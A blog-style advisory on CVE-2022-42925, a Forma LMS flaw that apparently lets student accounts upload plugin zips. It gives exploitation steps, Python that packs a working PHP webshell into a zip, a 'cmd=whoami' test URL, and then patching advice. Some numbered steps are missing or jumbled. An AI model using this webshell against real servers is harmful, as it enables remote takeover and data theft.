CVE-2022-42925 - How Forma LMS Student Uploads Can Become a Remote Code Injection Nightmare

CVE-2022-42925 is a critical vulnerability that affects Forma LMS (Learning Management System) software, version 3.1. and earlier. At first glance, it may sound like another technical bulletin. But if you use Forma LMS—especially for online education or corporate training—this flaw is alarming. Worse, a student account (one of the lowest-privileged accounts) can turn into an attacker’s gateway to full system compromise, all with a seemingly harmless zip file upload.

This article will walk you through what CVE-2022-42925 is, explain how privilege escalation happens, show you what exploiting it looks like (with code), and point you to the original sources for more info.

What Is CVE-2022-42925?

The root of CVE-2022-42925 is the way Forma LMS handles plugin zip uploads. The plugin upload component, meant for admins and teachers, should allow you to add widgets or extensions—nothing more. But, it turns out, an authenticated student can access this feature. Worse, Forma LMS does not properly sanitize or control the extraction location or contents of uploaded zip files.

This “zip slip” flaw lets a student upload a zip file containing malicious PHP code, which the LMS will extract straight into a web-accessible directory. The next step for an attacker is simple: visit the URL, and the PHP code runs—allowing anything from stealing data to full server takeover.

Where’s the Proof?

- Security Advisory (GitHub)
- NIST NVD Entry
- Forma LMS Changelog

Log in as a student (any valid credentials will do).

2. Access the plugin upload feature — either directly (if no access control) or via a crafted request.

Upload the malicious zip via the plugin upload form.

5. Run your payload: Browse to https://your-forma-lms/plugins/evil.php

Below is a Python example of creating a zip containing a simple PHP webshell

import zipfile

# Simple PHP webshell code
shell_code = """<?php
if(isset($_REQUEST['cmd'])){
    echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';
}
?>"""

# Save the webshell as evil.php
with open('evil.php', 'w') as f:
    f.write(shell_code)

# Put evil.php in a zip archive
with zipfile.ZipFile('plugin-shell.zip', 'w') as zipf:
    # Place the file in the root of the plugin directory;
    # Adjust path as needed for Forma LMS extraction process.
    zipf.write('evil.php', arcname='evil.php')

print('Malicious plugin-shell.zip created.')

Now upload plugin-shell.zip through the plugin upload interface.

What Happens Next?

If the server extracts the zip (without proper permissions or sanitizing paths/filenames), the attacker’s evil.php will be accessible via the Forma LMS website. This offers instant command-injection via a browser.

Example:  

https://your-forma-lms/plugins/evil.php?cmd=whoami

This returns the server username running PHP—a classic sign of remote code execution.

Easy to automate – The attack can be scripted and scaled.

- Sensitive data at risk – User data, administrator credentials, and system files are all exposed.

Responsible Disclosure

Forma LMS maintainers were contacted and patched this as of version 3.1.1.  
Users are urged to upgrade immediately.

If you can’t upgrade, disable plugin uploads or restrict access as much as possible.

- Monitor your plugins/ folder on the webserver for unexpected PHP files.

Final Thoughts

CVE-2022-42925 is proof that even “safe” user roles in your LMS can be dangerous if upload components are not rigorously protected. If you use Forma LMS, patch it now—before a student turns superuser on your server.

Original References

- FormaLMS GitHub advisory
- NVD: CVE-2022-42925
- Forma LMS Official Site


Stay safe, stay patched, and always be cautious with file uploads—even from your “trusted” students!

Timeline

Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 17:30:00 UTC